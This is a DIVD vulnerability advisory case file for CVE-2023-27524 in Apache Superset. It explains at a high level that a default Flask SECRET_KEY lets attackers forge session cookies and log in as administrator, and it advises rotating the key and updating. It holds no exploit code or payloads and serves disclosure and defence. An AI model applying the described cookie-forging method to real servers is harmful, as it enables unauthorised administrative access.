DIVD-2023-00026 - Apache Superset authentication bypass leads to RCE - CVE-2023-27524
Our reference | DIVD-2023-00026 |
Case lead | Finn van der Knaap |
Researcher(s) | |
CVE(s) | |
Product | Apache Superset |
Versions |
|
Recommendation | Rotate the SECRET_KEY and update to the latest version |
Workaround | Rotate the SECRET_KEY by following this article from Apache: [Configuring the SECRET_KEY](https://superset.apache.org/docs/installation/configuring-superset) |
Status | Open |
Last modified | 06 Jul 2023 13:29 |
Summary
Recently, a writeup was posted for a vulnerability, tracked as CVE-2023-27524, in the open source tool Apache Superset. A default Flask SECRET_KEY is used, this key signs the cookies of user logging in. By default, this key is one of 5 standard keys, which per the software’s documentation should be changed. When an attacker knows this key, they can sign their own cookies, as a result the attacker can forge their own cookies to log in as an administrator.
What you can do
- Rotate the SECRET_KEY by following the article on Apache on their website: https://superset.apache.org/docs/installation/configuring-superset. And update to the latest version
What we are doing
- DIVD is currently identifying all the vulnerable Superset servers.
Timeline
Date | Description |
---|---|
02 Jul 2023 | Started research |
02 Jul 2023- 02 Jul 2023 |
publishing casefile |
gantt
title DIVD-2023-00026 - Apache Superset authentication bypass leads to RCE - CVE-2023-27524
dateFormat YYYY-MM-DD
axisFormat %e %b %Y
section Case
DIVD-2023-00026 - Apache Superset authentication bypass leads to RCE - CVE-2023-27524 (still open) :2023-07-02, 2023-12-13
section Events
Started research : milestone, 2023-07-02, 0d
publishing casefile (0 days) : 2023-07-02, 2023-07-02